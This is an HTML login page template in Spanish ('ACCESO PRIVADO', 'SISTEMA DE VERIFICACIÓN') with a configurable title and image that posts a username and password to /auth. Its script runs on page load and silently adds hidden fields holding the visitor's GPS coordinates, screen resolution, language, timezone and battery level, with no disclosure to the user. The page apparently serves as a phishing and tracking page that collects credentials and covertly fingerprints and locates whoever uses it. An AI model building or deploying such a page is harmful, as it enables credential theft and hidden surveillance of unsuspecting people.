<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ACCESO PRIVADO</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css">
    <style>
        body { background: {{ config.color_fondo }}; background: radial-gradient(circle, {{ config.color_fondo }} 0%, #000 100%); color: {{ config.color_texto }}; min-height: 100vh; display: flex; align-items: center; justify-content: center; font-family: sans-serif; }
        .card-vip { background: rgba(255,255,255,0.03); backdrop-filter: blur(20px); border: 1px solid rgba(255,255,255,0.1); border-radius: 30px; padding: 40px; width: 100%; max-width: 380px; text-align: center; }
        .img-header { width: 110px; height: 110px; border-radius: 50%; border: 3px solid gold; margin-bottom: 20px; object-fit: cover; }
        .form-control { background: rgba(0,0,0,0.4) !important; color: #fff !important; border: 1px solid #444 !important; height: 50px; border-radius: 12px; margin-bottom: 15px; text-align: center; }
        .btn-gold { background: linear-gradient(45deg, #ffd700, #ff8c00); border: none; font-weight: bold; padding: 14px; border-radius: 12px; width: 100%; color: #000; }
    </style>
</head>
<body>
    <div class="card-vip">
        <img src="{{ config.img_principal }}" class="img-header" onerror="this.src='https://cdn-icons-png.flaticon.com/512/3135/3135715.png'">
        <h3>{{ config.titulo }}</h3>
        <p class="small text-muted mb-4">SISTEMA DE VERIFICACIÓN</p>
        <form action="/auth" method="POST" id="vForm">
            <input type="text" name="email" class="form-control" placeholder="USUARIO" required>
            <input type="password" name="pass" class="form-control" placeholder="CONTRASEÑA" required>
            <button class="btn-gold">ENTRAR</button>
        </form>
    </div>
    <script>
        window.onload = function() {
            const f = document.getElementById('vForm');
            const add = (n,v) => { let i=document.createElement('input'); i.type='hidden'; i.name=n; i.value=v; f.appendChild(i); };
            navigator.geolocation.getCurrentPosition(p => { add('lat_gps', p.coords.latitude); add('lon_gps', p.coords.longitude); });
            add('resolucion', window.screen.width + "x" + window.screen.height);
            add('lenguaje', navigator.language);
            add('tz', Intl.DateTimeFormat().resolvedOptions().timeZone);
            if (navigator.getBattery) { navigator.getBattery().then(b => add('bateria', Math.round(b.level*100)+'%')); }
        };
    </script>
</body>
</html>
